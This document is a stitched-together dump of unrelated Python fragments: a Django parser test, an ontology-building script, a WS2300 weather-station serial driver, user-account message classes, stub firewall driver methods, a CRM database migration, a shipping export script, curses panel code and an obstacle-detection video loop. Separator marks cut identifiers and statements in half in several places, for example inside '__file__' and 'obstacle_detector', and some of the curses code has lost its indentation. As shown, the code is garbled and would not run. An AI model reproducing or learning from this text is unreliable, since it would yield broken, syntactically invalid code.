        self.assertTrue(not isinstance(tree["value"], CodingRule))
        tree = parse(c("{}=={}".format(text_field.id, "u'a'")))
        self.assertEquals(tree, {"type": EQUALS, "values": (text_field, u'a')})
        cr.save()
        tree = parse(c("{cr.id} or {cr.id}".format(cr=cr)))
        self.assertEquals(tree, {"type": OR, "values": (parse(cr), parse(cr))})
        # Should accept greater than / greater or equal to / ...
        parse(c("{number_field.id} > 5".format(**locals())))
        parse(c("{number_field.id} < 5".format(**locals())))
        parse(c("{number_field.id} >= 5".format(**locals())))
        parse(c("{number_field.id} <= 5".format(**locals())))
        # ..but not if schemafieldtype is text or code
        self.assertRaises(SyntaxError, parse, c("{text_field.id} > 5".format(**locals())))
        self.assertRaises(SyntaxError, parse, c("{code_field.id} > 5".format(**locals())))
|
import json
# NOTE(review): the script relies on this star import also providing `sys`
# and `get_ontology` -- confirm before upgrading owlready.
from owlready import *
# input parameters
file_path = sys.argv[1]
onto_path = sys.argv[2]
# load ontology
onto = get_ontology(onto_path).load()
# course found list
course_ids = []
# For each course, find the active version (avoids multiple instances of
# one course): only the published branch of each course is used.
with open(file_path + '/modulestore.active_versions.json','r') as f:
    for line in f:
        course = json.loads(line)
        # for one course, only use its published version
        course_id = course['versions']['published-branch']['$oid']
        course_ids.append([course_id,'-v'+str(course['schema_version'])+':'+course['org']+'+'+course['course']+'+'+course['run']])
# Bug fix: the former `f.closed` / `fout.closed` statements were no-op
# attribute accesses (not `f.close()` calls) and have been removed; the
# `with` blocks already close the files.
for one_course in course_ids:
    course_id = one_course[0]
    # for each publish version we found, search for its structure data in json file
    with open(file_path + '/modulestore.structures.json', 'r') as f:
        for line in f:
            obj = json.loads(line)
            if obj['_id']['$oid'] == course_id:
                # temp save this data to a json file
                print('=======Find one=======')
                print(course_id)
                with open(file_path + '/' + course_id + '.json', 'w+') as fout:
                    json.dump(obj,fout)
                break
# function to find a instance by its id
def find_obj_by_oid(obj_list, obj_oid):
    """Return the first instance in `obj_list` whose name equals `obj_oid`.

    Returns None when no instance matches (or the list is empty).
    """
    # next() with a default replaces the manual search loop.
    return next((obj for obj in obj_list if obj.name == obj_oid), None)
# function to find a instance by its xml name
def find_obj_by_xml_id(obj_list, obj_xml_id, obj_name):
    """Return the first instance whose `<obj_name>_xml_id` property matches.

    An instance matches when it has the data property and its first value
    equals `obj_xml_id`. Returns None when nothing matches.
    """
    attr = obj_name + '_xml_id'  # hoisted: built once instead of per item
    return next(
        (obj for obj in obj_list
         if hasattr(obj, attr) and getattr(obj, attr)[0] == obj_xml_id),
        None)
# For each course found above: create an ontology individual for every
# block whose type exists in the ontology, then link parents to children
# via has_<type> object properties, and finally save the ontology.
for one_course in course_ids:
    course_id = one_course[0]
    # open its structure json file
    print('===========deal with course : ' + course_id + '===========')
    with open(file_path + '/' + course_id + '.json','r') as f:
        for line in f:
            obj = json.loads(line)
            # find all its blocks
            blocks = obj['blocks']
            for block in blocks:
                # for each block, if its type defined in ontology
                obj_name = block['block_type']
                if ('course_model.' + obj_name) in str(onto.classes):
                    obj_oid = block['definition']['$oid']
                    obj_xml_id = block['block_id']
                    # create an ontology individual for this block
                    temp_obj = getattr(onto, obj_name)(obj_oid)
                    # set xml id data property
                    getattr(temp_obj, obj_name+'_xml_id').append(obj_xml_id)
                    # set display name property (idiom: `in dict` over `.keys()`)
                    if 'display_name' in block['fields']:
                        obj_display_name = block['fields']['display_name']
                        getattr(temp_obj,obj_name+'_display_name').append(obj_display_name)
                    # if this instance is a course
                    if obj_name == 'course':
                        temp_id = obj_xml_id + str(one_course[1])
                        course_org = temp_id.split(':')[-1].split('+')[0]
                        course_tag = temp_id.split(':')[-1].split('+')[1]
                        # set course id, course org and course tag
                        getattr(temp_obj,obj_name+'_id').append(temp_id)
                        getattr(temp_obj,obj_name+'_org').append(course_org)
                        getattr(temp_obj,obj_name+'_tag').append(course_tag)
            # create object property
            for block in blocks:
                obj_name = block['block_type']
                if ('course_model.' + obj_name) in str(onto.classes):
                    obj_oid = block['definition']['$oid']
                    obj_list = onto.instances
                    temp_obj = find_obj_by_oid(obj_list, obj_oid)
                    # find sub-level instances of this block
                    # (removed unused local `temp_sub_obj_list`)
                    for sub_obj in block['fields']['children']:
                        sub_obj_name = sub_obj[0]
                        sub_obj_xml_id = sub_obj[1]
                        sub_obj_list = onto.instances
                        temp_sub_obj = find_obj_by_xml_id(sub_obj_list, sub_obj_xml_id, sub_obj_name)
                        # verticals contain generic xblocks
                        if obj_name == 'vertical':
                            temp_sub_obj_name = 'xblock'
                        else:
                            temp_sub_obj_name = sub_obj_name
                        if temp_sub_obj is not None:
                            # create object property
                            getattr(temp_obj,'has_' + temp_sub_obj_name).append(temp_sub_obj)
    # (removed the no-op `f.closed` statement; `with` closes the file)
onto.save()
|
for all characters to be sent.
#
def flush(self): raise NotImplementedError()
#
# Read a character, waiting for a most timeout seconds. Return the
# character read, or None if the timeout occurred.
#
def read_byte(self, timeout): raise NotImplementedError()
#
# Release the serial port. Closes it until it is used again, when
# it is automatically re-opened. It need not be implemented.
#
def release(self): pass
#
# Write characters to the serial port.
#
def write(self, data): raise NotImplementedError()
#
# A Linux Serial port. Implements the Serial interface on Linux.
#
class LinuxSerialPort(SerialPort):
    """Linux implementation of the SerialPort interface using termios/tty.

    NOTE: this file is Python 2 (`except EnvironmentError, e`, builtin
    `reduce`); keep it that way unless the whole driver is ported.
    """
    SERIAL_CSIZE = {
        "7": tty.CS7,
        "8": tty.CS8, }
    SERIAL_PARITIES= {
        "e": tty.PARENB,
        "n": 0,
        "o": tty.PARENB|tty.PARODD, }
    SERIAL_SPEEDS = {
        "300": tty.B300,
        "600": tty.B600,
        "1200": tty.B1200,
        "2400": tty.B2400,
        "4800": tty.B4800,
        "9600": tty.B9600,
        "19200": tty.B19200,
        "38400": tty.B38400,
        "57600": tty.B57600,
        "115200": tty.B115200, }
    SERIAL_SETTINGS = "2400,n,8,1"
    device = None # string, the device name.
    orig_settings = None # class, the original ports settings.
    select_list = None # list, The serial ports
    serial_port = None # int, OS handle to device.
    settings = None # string, the settings on the command line.
    #
    # Initialise ourselves.
    #
    def __init__(self,device,settings=SERIAL_SETTINGS):
        # Parse "speed,parity,bits,stop"; the three extra Nones make the
        # length check below (== 7) reject malformed settings strings.
        self.device = device
        self.settings = settings.split(",")
        self.settings.extend([None,None,None])
        self.settings[0] = self.__class__.SERIAL_SPEEDS.get(self.settings[0], None)
        self.settings[1] = self.__class__.SERIAL_PARITIES.get(self.settings[1].lower(), None)
        self.settings[2] = self.__class__.SERIAL_CSIZE.get(self.settings[2], None)
        if len(self.settings) != 7 or None in self.settings[:3]:
            raise FatalError(self.device, 'Bad serial settings "%s".' % settings)
        self.settings = self.settings[:4]
        #
        # Open the port.
        #
        try:
            self.serial_port = os.open(self.device, os.O_RDWR)
        except EnvironmentError, e:
            raise FatalError(self.device, "can't open tty device - %s." % str(e))
        try:
            fcntl.flock(self.serial_port, fcntl.LOCK_EX)
            self.orig_settings = tty.tcgetattr(self.serial_port)
            setup = self.orig_settings[:]
            setup[0] = tty.INPCK
            setup[1] = 0
            setup[2] = tty.CREAD|tty.HUPCL|tty.CLOCAL|reduce(lambda x,y: x|y, self.settings[:3])
            setup[3] = 0 # tty.ICANON
            setup[4] = self.settings[0]
            setup[5] = self.settings[0]
            # VMIN=1 / VTIME=0: reads block until at least one byte arrives.
            setup[6] = ['\000']*len(setup[6])
            setup[6][tty.VMIN] = 1
            setup[6][tty.VTIME] = 0
            tty.tcflush(self.serial_port, tty.TCIOFLUSH)
            #
            # Restart IO if stopped using software flow control (^S/^Q). This
            # doesn't work on FreeBSD.
            #
            try:
                tty.tcflow(self.serial_port, tty.TCOON|tty.TCION)
            except termios.error:
                pass
            tty.tcsetattr(self.serial_port, tty.TCSAFLUSH, setup)
            #
            # Set DTR low and RTS high and leave other control lines untouched.
            #
            arg = struct.pack('I', 0)
            arg = fcntl.ioctl(self.serial_port, tty.TIOCMGET, arg)
            portstatus = struct.unpack('I', arg)[0]
            portstatus = portstatus & ~tty.TIOCM_DTR | tty.TIOCM_RTS
            arg = struct.pack('I', portstatus)
            fcntl.ioctl(self.serial_port, tty.TIOCMSET, arg)
            self.select_list = [self.serial_port]
        except Exception:
            # Don't leak the file descriptor if the termios setup fails.
            os.close(self.serial_port)
            raise
    def close(self):
        # Restore the original termios state before closing the fd.
        if self.orig_settings:
            tty.tcsetattr(self.serial_port, tty.TCSANOW, self.orig_settings)
        os.close(self.serial_port)
    def read_byte(self, timeout):
        # select() implements the timeout; an empty ready list means nothing
        # arrived within `timeout` seconds.
        ready = select.select(self.select_list, [], [], timeout)
        if not ready[0]:
            return None
        return os.read(self.serial_port, 1)
    #
    # Write a string to the port.
    #
    def write(self, data):
        os.write(self.serial_port, data)
    #
    # Flush the input buffer.
    #
    def clear(self):
        tty.tcflush(self.serial_port, tty.TCIFLUSH)
    #
    # Flush the output buffer.
    #
    def flush(self):
        tty.tcdrain(self.serial_port)
#
# This class reads and writes bytes to a Ws2300. It is passed something
# that implements the Serial interface. The major routines are:
#
# Ws2300() - Create one of these objects that talks over the serial port.
# read_batch() - Reads data from the device using an scatter/gather interface.
# write_safe() - Writes data to the device.
#
class Ws2300(object):
    #
    # An exception for us.
    #
    class Ws2300Exception(WeeWxIOError):
        # Thin wrapper so ws2300-specific I/O failures can be caught distinctly.
        def __init__(self, *args):
            WeeWxIOError.__init__(self, *args)
#
# Constants we use.
#
MAXBLOCK = 30
MAXRETRIES = 50
MAXWINDRETRIES= 20
WRITENIB = 0x42
SETBIT = 0x12
UNSETBIT = 0x32
WRITEACK = 0x10
SETACK = 0x04
UNSETACK = 0x0C
RESET_MIN = 0x01
RESET_MAX = 0x02
MAX_RESETS = 100
#
# Instance data.
#
log_buffer = None # list, action log
log_mode = None # string, Log mode
long_nest = None # int, Nesting of log actions
serial_port = None # string, SerialPort port to use
    #
    # Initialise ourselves.
    #
    def __init__(self,serial_port):
        # serial_port: a SerialPort implementation used for all device I/O.
        self.log_buffer = []
        self.log_nest = 0
        self.serial_port = serial_port
    #
    # Write data to the device.
    #
    def write_byte(self,data):
        # Record a mode transition marker in the action log (space separates
        # runs; 'e' suppresses the separator), then log and send the byte.
        if self.log_mode != 'w':
            if self.log_mode != 'e':
                self.log(' ')
            self.log_mode = 'w'
        self.log("%02x" % ord(data))
        self.serial_port.write(data)
    #
    # Read a byte from the device.
    #
    def read_byte(self, timeout=1.0):
        # Returns the byte read, or None on timeout; either way the outcome
        # is recorded in the action log ("--" marks a timeout).
        if self.log_mode != 'r':
            self.log_mode = 'r'
            self.log(':')
        result = self.serial_port.read_byte(timeout)
        if result == None:
            self.log("--")
        else:
            self.log("%02x" % ord(result))
        return result
    #
    # Remove all pending incoming characters.
    #
    def clear_device(self):
        # Drops any buffered input and notes a "C" in the action log.
        if self.log_mode != 'e':
            self.log(' ')
        self.log_mode = 'c'
        self.log("C")
        self.serial_port.clear()
    #
    # Write a reset string and wait for a reply.
    #
    def reset_06(self):
        # Sends ACK (0x06) up to MAX_RESETS times; the station answers 0x02
        # once it is back in a known state. Raises Ws2300Exception on failure.
        self.log_enter("re")
        try:
            for _ in range(self.__class__.MAX_RESETS):
                self.clear_device()
                self.write_byte('\x06')
                #
                # Occasionally 0, then 2 is returned.  If 0 comes back,
                # continue reading as this is more efficient than sending
                # an out-of sync reset and letting the data reads restore
                # synchronization.  Occasionally, multiple 2's are returned.
                # Read with a fast timeout until all data is exhausted, if
                # we got a 2 back at all, we consider it a success.
                #
                success = False
                answer = self.read_byte()
                while answer != None:
                    if answer == '\x02':
                        success = True
                    answer = self.read_byte(0.05)
                if success:
                    return
            msg = "Reset failed, %d retries, no response" % self.__class__.MAX_RESETS
            raise self.Ws2300Exception(msg)
        finally:
            self.log_exit()
#
# Encode the address.
#
def write_address(self,address):
for digit in range(4):
byte = chr((address >> (4 * (3-digit)) & 0x |
import datetime
class AuthenticationInfo:
    """Credential pair (password + email) attached to account requests."""

    def __init__(self, password, email):
        self.Email = email
        self.Password = password
class ProfileInfo:
    """User-editable profile data (currently just the display name)."""

    def __init__(self, display_name):
        self.DisplayName = display_name
class Token:
    """Session token: an opaque id plus the moment it stops being valid."""

    def __init__(self, id_token, valid_until):
        self.ValidUntil = valid_until
        self.Id = id_token
class User:
    """Public view of an account: id, names and group membership."""

    def __init__(self, id_user, username, display_name, groups):
        self.Groups = groups
        self.DisplayName = display_name
        self.Username = username
        self.IdUser = id_user
class Group:
    """A named user group."""

    def __init__(self, id_group, name):
        self.Name = name
        self.Id = id_group
class CreateUserRequest:
    """Payload for account creation: username plus auth and profile info."""

    def __init__(self, username, authentication, profile):
        self.Profile = profile
        self.Authentication = authentication
        self.Username = username
class ModifyCredentialsRequest:
    """Authenticated request replacing a user's credentials."""

    def __init__(self, username, token, authentication):
        self.Authentication = authentication
        self.Token = token
        self.Username = username
class ModifyProfileRequest:
    """Authenticated request replacing a user's profile data."""

    def __init__(self, username, token, profile):
        self.Profile = profile
        self.Token = token
        self.Username = username
class AddUserToGroupRequest:
    """Authenticated request adding `user_to_add` to group `id_group`."""

    def __init__(self, username, token, user_to_add, id_group):
        self.IdGroup = id_group
        self.UserToAdd = user_to_add
        self.Token = token
        self.Username = username
class TokenSuccessResponse:
    """Generic response: a success flag plus a (possibly refreshed) token."""

    def __init__(self, success, token):
        self.Token = token
        self.Success = success

    @staticmethod
    def invalid():
        """Failure response carrying an empty, already-expired token."""
        stale = Token("", datetime.datetime.now())
        return TokenSuccessResponse(False, stale)
class ConnectUserResponse:
    """Login response: success flag, session token and the user's id."""

    def __init__(self, success, token, id_user):
        self.IdUser = id_user
        self.Token = token
        self.Success = success

    @staticmethod
    def invalid():
        """Failure response: empty expired token, user id 0."""
        stale = Token("", datetime.datetime.now())
        return ConnectUserResponse(False, stale, 0)
class UserSummaryResponse:
    """Response describing one user: display name and group list."""

    def __init__(self, success, token, display_name, groups):
        self.Groups = groups
        self.DisplayName = display_name
        self.Token = token
        self.Success = success

    @staticmethod
    def invalid():
        """Failure response with empty profile data."""
        stale = Token("", datetime.datetime.now())
        return UserSummaryResponse(False, stale, "", [])
class UserListResponse:
    """Response carrying a list of User records."""

    def __init__(self, success, token, users):
        self.Users = users
        self.Token = token
        self.Success = success

    @staticmethod
    def invalid():
        """Failure response with an empty user list."""
        stale = Token("", datetime.datetime.now())
        return UserListResponse(False, stale, [])
|
#
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron_fwaas.services.firewall.drivers import fwaas_base
from networking_odl.common import client as odl_client
from networking_odl.common import config # noqa
LOG = logging.getLogger(__name__)
class OpenDaylightFwaasDriver(fwaas_base.FwaasDriverBase):
    """OpenDaylight FWaaS Driver
    This code is the backend implementation for the OpenDaylight FWaaS
    driver for Openstack Neutron.
    """
    def __init__(self):
        # Builds the ODL REST client from neutron's networking-odl config.
        LOG.debug("Initializing OpenDaylight FWaaS driver")
        self.client = odl_client.OpenDaylightRestClient.create_client()
    def create_firewall(self, apply_list, firewall):
        """Create the Firewall with default (drop all) policy.
        The default policy will be applied on all the interfaces of
        trusted zone.
        """
        # TODO(review): stub -- no request is sent to OpenDaylight yet.
        pass
    def delete_firewall(self, apply_list, firewall):
        """Delete firewall.
        Removes all policies created by this instance and frees up
        all the resources.
        """
        # TODO(review): stub -- no request is sent to OpenDaylight yet.
        pass
    def update_firewall(self, apply_list, firewall):
        """Apply the policy on all trusted interfaces.
        Remove previous policy and apply the new policy on all trusted
        interfaces.
        """
        # TODO(review): stub -- no request is sent to OpenDaylight yet.
        pass
    def apply_default_policy(self, apply_list, firewall):
        """Apply the default policy on all trusted interfaces.
        Remove current policy and apply the default policy on all trusted
        interfaces.
        """
        # TODO(review): stub -- no request is sent to OpenDaylight yet.
        pass
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
    """Initial schema for the CRM app: companies, contacts, campaigns,
    opportunities with a staged pipeline, call logs, reminders and reports.

    NOTE: auto-generated migration -- do not reorder operations; the
    AddField operations at the bottom depend on the models created above.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='CallLog',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField(auto_now_add=True)),
                ('note', models.TextField()),
            ],
        ),
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=200)),
                ('description', models.TextField(null=True, blank=True)),
            ],
        ),
        migrations.CreateModel(
            name='Company',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=200)),
                ('website', models.URLField(null=True, blank=True)),
                ('address1', models.CharField(max_length=200, null=True, blank=True)),
                ('address2', models.CharField(max_length=200, null=True, blank=True)),
                ('city', models.CharField(max_length=200, null=True, blank=True)),
                ('state', models.CharField(max_length=200, null=True, blank=True)),
                ('zipcode', models.CharField(max_length=200, null=True, blank=True)),
                ('country', models.CharField(max_length=200, null=True, blank=True)),
                ('phone', models.CharField(max_length=200, null=True, blank=True)),
            ],
            options={
                'verbose_name_plural': 'companies',
            },
        ),
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('first_name', models.CharField(max_length=200)),
                ('last_name', models.CharField(max_length=200)),
                ('address1', models.CharField(max_length=200, null=True, blank=True)),
                ('address2', models.CharField(max_length=200, null=True, blank=True)),
                ('city', models.CharField(max_length=200, null=True, blank=True)),
                ('state', models.CharField(max_length=200, null=True, blank=True)),
                ('zipcode', models.CharField(max_length=200, null=True, blank=True)),
                ('country', models.CharField(max_length=200, null=True, blank=True)),
                ('phone', models.CharField(max_length=200, null=True, blank=True)),
                ('email', models.EmailField(max_length=200, null=True, blank=True)),
                ('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Opportunity',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # help_text uses bytes literals (b'...') -- generated under
                # Python 2; Django treats them as text here.
                ('value', models.FloatField(help_text=b'How much this opportunity is worth to the organization')),
                ('create_date', models.DateTimeField(auto_now_add=True)),
                ('company', models.ForeignKey(blank=True, to='crm.Company', null=True)),
                ('contact', models.ForeignKey(to='crm.Contact')),
                ('source', models.ForeignKey(help_text=b'How did this contact find out about us?', to='crm.Campaign')),
            ],
            options={
                'verbose_name_plural': 'opportunities',
            },
        ),
        migrations.CreateModel(
            name='OpportunityStage',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('opportunity', models.ForeignKey(to='crm.Opportunity')),
            ],
        ),
        migrations.CreateModel(
            name='Reminder',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateField()),
                ('note', models.CharField(max_length=200)),
                ('completed', models.BooleanField(default=False)),
                ('opportunity', models.ForeignKey(to='crm.Opportunity')),
            ],
        ),
        migrations.CreateModel(
            name='Report',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=200)),
                ('link', models.URLField()),
            ],
        ),
        migrations.CreateModel(
            name='Stage',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=200)),
                ('order', models.IntegerField(help_text=b'The order this is displayed on the screen')),
                ('description', models.TextField(null=True, blank=True)),
                ('value', models.IntegerField(help_text=b'On a scale of 0 to 100 of the stage of the pipeline')),
            ],
        ),
        # Foreign keys added after model creation to break circular deps.
        migrations.AddField(
            model_name='opportunitystage',
            name='stage',
            field=models.ForeignKey(to='crm.Stage'),
        ),
        migrations.AddField(
            model_name='opportunitystage',
            name='user',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='opportunity',
            name='stage',
            field=models.ForeignKey(to='crm.Stage'),
        ),
        migrations.AddField(
            model_name='opportunity',
            name='user',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='calllog',
            name='opportunity',
            field=models.ForeignKey(to='crm.Opportunity'),
        ),
        migrations.AddField(
            model_name='calllog',
            name='user',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
        ),
    ]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import locale
import os
import sys
from datetime import date
from kargoxml import add_column
script_dir = os.path.split(os.path.abspath(os.path.dirname(__file__ | )))[0]
project_dir = os.path.split(script_dir)[0]
sys.path.append(project_dir)
sys.path.append(os.path.split(project_dir)[0])
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from oi.shipit.models import CdClient
from oi.shipit.models import PardusVersion
from django.template | .defaultfilters import slugify
if __name__ == '__main__':
    args = sys.argv
    pardus_versions = PardusVersion.objects.all()
    if len(args) != 2:
        # BUG FIX: the original wrote `print("...") % __file__`, applying %
        # to print()'s return value (None) and raising TypeError. Format
        # the string itself instead.
        print("Usage: python %s [limit]" % __file__)
        sys.exit()
    try:
        limit = int(args[-1])
    except ValueError:
        # Same operator-placement fix as above.
        print("Invalid limit: %s" % args[-1])
        sys.exit()
    #locale.setlocale(locale.LC_ALL, "tr_TR.UTF-8")
    # For every Pardus release, export the oldest `limit` confirmed,
    # unsent, untaken CD requests into today's column of the kargo sheet.
    for version in pardus_versions:
        cdclient = CdClient.objects.filter(confirmed=1,
            sent=0, taken=0, version=version).order_by('date')[:limit]
        add_column(cdclient, date.today().isoformat(), slugify(version))
|
nt
"""
if self.top != top:
self.top = top
self.win = None
  def getLeft(self):
    """
    Provides the left position (column offset) where this subwindow is
    placed within its parent.
    """
    return self.left
def setLeft(self, left):
"""
Changes the left position where this subwindow is placed within its parent.
Arguments:
left - positioning of top within parent
"""
if self.left != left:
self.left = left
self.win = None
  def getHeight(self):
    """
    Provides the height cap used for subwindows (-1 if it isn't limited).
    """
    return self.height
def setHeight(self, height):
"""
Changes the height used for subwindows. This uses all available space if -1.
Arguments:
height - maximum height of panel (uses all available space if -1)
"""
if self.height != height:
self.height = height
self.win = None
  def getWidth(self):
    """
    Provides the width cap used for subwindows (-1 if it isn't limited).
    """
    return self.width
def setWidth(self, width):
"""
Changes the width used for subwindows. This uses all available space if -1.
Arguments:
width - maximum width of panel (uses all available space if -1)
"""
if self.width != width:
self.width = width
self.win = None
def getPreferredSize(self):
"""
Provides the dimensions the subwindow would use when next redrawn, given
that none of the properties of the panel or parent change before then. This
returns a tuple of (height, width).
"""
newHeight, newWidth = self.parent.getmaxyx()
setHeight, setWidth = self.getHeight(), self.getWidth()
newHeight = max(0, newHeight - self.top)
newWidth = max(0, newWidth - self.left)
if setHeight != -1: newHeight = min(newHeight, setHeight)
if setWidth != -1: newWidth = min(newWidth, setWidth)
return (newHeight, newWidth)
  def handleKey(self, key):
    """
    Handler for user input. This returns true if the key press was consumed,
    false otherwise.
    Arguments:
      key - keycode for the key pressed
    """
    # base panels consume nothing; subclasses override this
    return False
  def getHelp(self):
    """
    Provides help information for the controls this page provides. This is a
    list of tuples of the form...
    (control, description, status)
    """
    # no controls by default; subclasses override this
    return []
  def draw(self, width, height):
    """
    Draws display's content. This is meant to be overwritten by
    implementations and not called directly (use redraw() instead). The
    dimensions provided are the drawable dimensions, which in terms of width is
    a column less than the actual space.
    Arguments:
      width - horizontal space available for content
      height - vertical space available for content
    """
    # intentionally a no-op in the base class
    pass
  def redraw(self, forceRedraw=False, block=False):
    """
    Clears display and redraws its content. This can skip redrawing content if
    able (ie, the subwindow's unchanged), instead just refreshing the display.
    Arguments:
      forceRedraw - forces the content to be cleared and redrawn if true
      block - if drawing concurrently with other panels this determines
              if the request is willing to wait its turn or should be
              abandoned
    """
    # skipped if not currently visible or activity has been halted
    if not self.isVisible() or HALT_ACTIVITY: return
    # if the panel's completely outside its parent then this is a no-op
    newHeight, newWidth = self.getPreferredSize()
    if newHeight == 0 or newWidth == 0:
      self.win = None
      return
    # recreates the subwindow if necessary
    isNewWindow = self._resetSubwindow()
    # The reset argument is disregarded in a couple of situations:
    # - The subwindow's been recreated (obviously it then doesn't have the old
    #   content to refresh).
    # - The subwindow's dimensions have changed since last drawn (this will
    #   likely change the content's layout)
    subwinMaxY, subwinMaxX = self.win.getmaxyx()
    if isNewWindow or subwinMaxY != self.maxY or subwinMaxX != self.maxX:
      forceRedraw = True
    self.maxY, self.maxX = subwinMaxY, subwinMaxX
    # bail out rather than wait if another panel holds the lock and we can't block
    if not CURSES_LOCK.acquire(block): return
    try:
      if forceRedraw:
        self.win.erase() # clears any old contents
        self.draw(self.maxX, self.maxY)
      self.win.refresh()
    finally:
      CURSES_LOCK.release()
  def hline(self, y, x, length, attr=curses.A_NORMAL):
    """
    Draws a horizontal line. This should only be called from the context of a
    panel's draw method.
    Arguments:
      y - vertical location
      x - horizontal location
      length - length the line spans
      attr - text attributes
    """
    # silently skipped when the start point lies outside the drawable area
    if self.win and self.maxX > x and self.maxY > y:
      try:
        drawLength = min(length, self.maxX - x)
        self.win.hline(y, x, curses.ACS_HLINE | attr, drawLength)
      except:
        # in edge cases drawing could cause a _curses.error
        pass
  def vline(self, y, x, length, attr=curses.A_NORMAL):
    """
    Draws a vertical line. This should only be called from the context of a
    panel's draw method.
    Arguments:
      y - vertical location
      x - horizontal location
      length - length the line spans
      attr - text attributes
    """
    # silently skipped when the start point lies outside the drawable area
    if self.win and self.maxX > x and self.maxY > y:
      try:
        drawLength = min(length, self.maxY - y)
        self.win.vline(y, x, curses.ACS_VLINE | attr, drawLength)
      except:
        # in edge cases drawing could cause a _curses.error
        pass
  def addch(self, y, x, char, attr=curses.A_NORMAL):
    """
    Draws a single character. This should only be called from the context of a
    panel's draw method.
    Arguments:
      y - vertical location
      x - horizontal location
      char - character to be drawn
      attr - text attributes
    """
    # silently skipped when the location lies outside the drawable area
    if self.win and self.maxX > x and self.maxY > y:
      try:
        self.win.addch(y, x, char, attr)
      except:
        # in edge cases drawing could cause a _curses.error
        pass
def addstr(self, y, x, msg, attr=curses.A_NORMAL):
    """
    Writes string to subwindow if able. This takes into account screen bounds
    to avoid making curses upset. This should only be called from the context
    of a panel's draw method.

    Arguments:
      y    - vertical location
      x    - horizontal location
      msg  - text to be added
      attr - text attributes
    """
    # subwindows need a single character buffer (either in the x or y
    # direction) from actual content to prevent crash when shrank
    if self.win and self.maxX > x and self.maxY > y:
        try:
            # truncate the message to the space actually available
            self.win.addstr(y, x, msg[:self.maxX - x], attr)
        except curses.error:
            # this might produce a _curses.error during edge cases, for
            # instance when resizing with visible popups; catch only that
            # instead of the previous bare except
            pass
def addfstr(self, y, x, msg):
"""
Writes string to subwindow. The message can contain xhtml-style tags for
formatting, including:
<b>text</b> bold
<u>text</u> underline
<h>text</h> highlight
<[color]>text</[color]> use color (see getColor() for constants)
Tag nesting is supported and tag closing is str |
#!/usr/bin/python3
import numpy as np
import cv2
from collections import deque
from obstacle_detector.distance_calculator import spline_dist
from obst | acle_detector.perspective import inv_persp_new
from obstacle_detector.perspective import regress_perspecive
from obstacle_detector.depth_mapper import calculate_depth_map
from obstacle_detector.tm.image_shift_calculator import find_shift_value
def video_test(input_video_path=None, output_video_path=None):
    """Preview a crude depth map built from the right halves of two frames
    taken a few steps apart in the input video.

    Arguments:
      input_video_path  - video file to read; prompts on stdin when None
      output_video_path - path for the XVID writer ('output.avi' when None).
                          NOTE(review): the writer is opened and released but
                          never written to; kept only to preserve the
                          output-file side effect.

    Side effects: opens OpenCV preview windows, writes 'screen.png' when 's'
    is pressed; ESC quits.
    """
    # region-of-interest geometry for the inverse perspective mapping
    cx = 595
    cy = 303
    roi_width = 25
    roi_length = 90

    cap = cv2.VideoCapture(
        input_video_path if input_video_path is not None
        else input('enter video path: '))

    # rolling buffers with the 15 most recent raw frames and their
    # top-down (inverse perspective) projections
    old_images = deque()
    original_frames = deque()
    ret, frame = cap.read()
    for _ in range(15):
        original_frames.append(frame)
        img, pts1 = inv_persp_new(
            frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
        old_images.append(img)
        ret, frame = cap.read()

    height, width, _ = frame.shape
    out_height, out_width, _ = img.shape

    fourcc = cv2.VideoWriter_fourcc(*'XVID')
    out = cv2.VideoWriter(
        output_video_path if output_video_path is not None
        else 'output.avi',
        fourcc, 15.0, (out_width * 4, out_height))

    while ret:
        original_frames.popleft()
        ret, frame = cap.read()
        if not ret:
            # the original kept going with frame=None here and crashed
            # inside inv_persp_new on the final (failed) read
            break
        original_frames.append(frame)
        img, pts1 = inv_persp_new(
            frame, (cx, cy), (roi_width, roi_length), spline_dist, 200)
        old_images.popleft()
        old_images.append(img)

        # right halves of frames 4 steps apart act as a pseudo stereo pair
        left = original_frames[-5][:, width // 2:]
        right = original_frames[-1][:, width // 2:]
        left = cv2.pyrDown(left)
        left = cv2.blur(left, (3, 3))
        right = cv2.pyrDown(right)
        right = cv2.blur(right, (3, 3))

        depth = calculate_depth_map(left, right)
